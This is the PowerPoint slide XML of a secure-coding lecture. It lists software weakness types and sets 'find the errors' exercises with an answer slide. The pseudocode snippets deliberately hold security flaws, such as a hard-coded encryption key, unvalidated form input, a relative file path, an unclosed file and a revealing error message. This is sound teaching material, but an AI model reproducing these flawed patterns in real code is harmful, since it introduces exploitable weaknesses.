                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>Unrestricted upload of file with dangerous type (image vs executable)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>Execution with unnecessary privileges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>Use of poor encryption algorithm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>Download of code without integrity check</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>Inclusion of Functionality from Untrusted Control Sphere (e.g., Client libraries)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="168252707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936E8-CD0B-4090-AD9F-DA128A5445ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Checking Understanding</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9490967-B555-4675-98E3-EE04C9EF5E17}"/>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7248020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CF8BF4CA-77B1-4223-B17F-BAAB8575609C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>Test Yourself:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="4000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>Other Security Errors</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55299" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7CCA3E0F-BF9B-432E-A16A-0083FE2C594A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1981200"/>
            <a:ext cx="8229600" cy="4343400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>Find the errors:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>Security() {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>   String contents, environment;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>   String spath = “security.dat”;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>   File security = new File;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>   if (security.open(spath) &gt;0) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>      contents = security.read();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>      environment = security.read();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>   } else {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>      print(“Error: Security.dat not found”);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>   }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>} </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>   </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="55300" name="Picture 4" descr="MCj00843820000[1]">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3406EE86-B36B-4568-9D3E-ABDEA1EECE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12192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1" name="Picture 5" descr="MCj00843820000[1]">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{566EF0B1-7F48-4A75-992A-65FCF7E439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4572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2" name="Picture 6" descr="MCj00843820000[1]">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{783F7CD3-78F0-4F1B-B3F5-E1022FE648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4572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3" name="Picture 7" descr="MCj00843820000[1]">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA740B84-FF20-4481-A01C-D27B69ABFB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4572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CCB43B1B-F276-489B-ABB6-4F8ED041736C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>Test Yourself:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="4000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>Other Security Errors</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57347" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49CD8D27-D315-47AB-990E-07E62EFF8E69}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1981200"/>
            <a:ext cx="4038600" cy="4495800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>Find the errors:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>Security() {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>   String contents, environment;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>   String spath = “security.dat”;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>   File security = new File;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>   if (security.open(spath) &gt;0) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>      contents = security.read();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>      environment = security.read();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>   } else {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>      print(“Error: Security.dat not found”);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>   }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>} </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>   </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57348" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15ED9999-0F25-46BE-8941-72AA8A6C76CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4419600" y="1981200"/>
            <a:ext cx="4267200" cy="4648200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="381000" indent="-381000" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>Variables contents &amp; environment not initialized</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="n"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800"/>
              <a:t>Can cause problems if executed in certain ways</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="n"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800"/>
              <a:t>Attacker can initialize or read variables from previous session</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="381000" indent="-381000" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>“security.dat” is not full pathname.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="n"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800"/>
              <a:t>File can be replaced if run from another location</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="381000" indent="-381000" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>File ‘security’ not closed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800"/>
              <a:t>Leaves file open to attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800"/>
              <a:t>Keeps unnecessary resources busy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="381000" indent="-381000" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>Error message indicates file name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="n"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800"/>
              <a:t>Can give attacker important info</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DA10375D-E2E0-45A4-9110-C3740581738C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>Test Yourself:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="4000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>More Security Errors</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59395" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF8493E8-DCFE-4C51-9691-F4A4D5ADA780}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1981200"/>
            <a:ext cx="8229600" cy="4343400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>Find the errors:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>purchaseProduct() {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>   encryptKey = “N23m**2d3”;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>   count = form.quantity;     // input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>   total = count * product.cost();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>   Message m = new Message(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>      name,product,total);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>   m.myEncrypt(encryptKey);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>   server.send(m);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>} </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>   </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="59396" name="Picture 4" descr="MCj00843820000[1]">
